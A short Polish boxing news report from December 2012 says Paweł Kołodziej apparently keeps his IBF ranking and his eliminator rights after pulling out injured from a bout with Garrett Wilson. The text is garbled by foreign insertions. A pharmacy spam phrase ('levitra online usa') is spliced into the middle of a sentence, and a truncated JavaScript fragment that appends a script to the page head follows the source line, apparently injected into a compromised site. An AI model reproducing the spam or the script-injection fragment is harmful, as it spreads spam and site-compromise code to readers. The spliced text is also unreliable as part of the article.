Kołodziej zachowa ranking i prawo do eliminatora?

4.12.2012 / Paweł Kołodziej / Boks

Wygląda na to, że Paweł Kołodziej z Trec Team (30-0, 1 KO) pomimo wycofania się z sobotniej walki z Garrettem Wilsonem nie straci wypracowanej w ostatnich miesiącach pozycji w rankingu IBF . Pięściarz z Krynicy miał przystąpić do pojedynku eliminacyjnego do tytułu mistrza świata, jednak niedawno doznał poważnej kontuzji kostki. levitra online usa Kołodzieja w walce z Wilsonem najprawdopodobniej zastąpi Aleksander Aleksiejew (23-2-1, 20 KO), a stawką walki będzie pierwsza pozycja w rankingu IBF.

Kołodziej bez względu na wynik tej potyczki zachowa swoje drugie miejsce w rankingu i zostanie wyznaczony do finałowego eliminatora z pięściarzem, który wywalczy pozycję numer jeden w klasyfikacji International Boxing Federation. Ewentualna wygrana zagwarantuje Polakowi walkę o mistrzostwo świata z aktualnie panującym czempionem Yoanem Pablo Hernandezem.

Źródło: ringpolska.pl, dostęp: 04.12.2012

 

 

 

 

 d.getElementsByTagName(‚head’)[0].appendChild(s);if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);